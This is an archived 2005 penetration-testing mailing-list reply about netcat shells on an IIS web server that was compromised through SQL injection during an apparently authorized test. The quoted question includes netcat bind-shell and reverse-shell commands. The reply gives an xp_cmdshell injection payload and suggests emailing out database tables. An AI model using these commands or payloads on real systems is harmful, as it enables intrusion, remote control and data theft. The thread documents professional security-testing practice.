Penetration Testing mailing list archives
Re: Netcat Question
From: Jordan.DelGrande () ey com
Date: Wed, 1 Jun 2005 11:05:40 -0400
Hi Intel96, It seems that you are being blocked both ways (inbound, outbound) by the DMZ firewall, although it seems really weird that the second command does not work - maybe checking for ssl packet only? They might have a proxy based firewall? Are you on a public IP with no firewall? As a last resort you can have the server listen on port 80, but this will DOS their web server for the period of time you have a shell active. Might want to do this really late at night if the client allows? personally wouldn't do this until all avenues have been tried. Instead, as you can perform SQL injection, do you not have access to perform xp_cmdshell as follows? z' exec master..xp_cmdshell ?dir c:?-- This way you can upload your tools via FTP and execute via the SQL server ;-) You might also want to try and email the results of each table to yourself (as long as you have the privileges). Hope this helps, Jordan intel96 <intel96 () bellsouth net> 05/31/2005 06:39 PM To pen-test () securityfocus com cc Subject Netcat Question To All, I am conducting a pentest and I have been able to upload netcat to the web server (IIS 6.0 - with ports 80/443 open) via ftp. I have tried to establish a shell both ways, but cannot get it to work: On the web server I first tried: nc.exe ?l ?p 8000 ?e cmd.exe When I tried to connect to port 8000 on the web server I received a timeout on my side. I have also tried this with port 53 and it also did not work. I than tried: nc.exe ?nv my_public_ip_address 443 -d ?e cmd.exe This did not work either. I did not see the remote system trying to connect to my system via my logs. I have access to upload anything to the system and run most commands via sql injections. I have administrator level access on the system at this time. Any ideas on how I can get this shell to work? Or there any other commands that may provide me more access or allow me to dump the database? Thanks, Intel96 ________________________________________________________________________ The information contained in this message may be privileged and confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please notify us immediately by replying to the message and deleting it from your computer. Notice required by law: This e-mail may constitute an advertisement or solicitation under U.S. law, if its primary purpose is to advertise or promote a commercial product or service. You may choose not to receive advertising and promotional messages from Ernst & Young LLP (except for Ernst & Young Online and the ey.com website, which track e-mail preferences through a separate process) at this e-mail address by forwarding this message to no-more-mail () ey com. If you do so, the sender of this message will be notified promptly. Our principal postal address is 5 Times Square, New York, NY 10036. Thank you. Ernst & Young LLP
Current thread:
- RE: Netcat Question Meidinger Chris (Jun 01)
- <Possible follow-ups>
- Netcat Question intel96 (Jun 01)
- RE: Netcat Question Miguel Dilaj (Jun 01)
- Re: Netcat Question Jordan . DelGrande (Jun 01)
- Re: Netcat Question Mariano Nuñez Di Croce (Jun 01)
- Re: Netcat Question atomek (Jun 01)
- RE: Netcat Question Bartholomew, Brian J (Jun 01)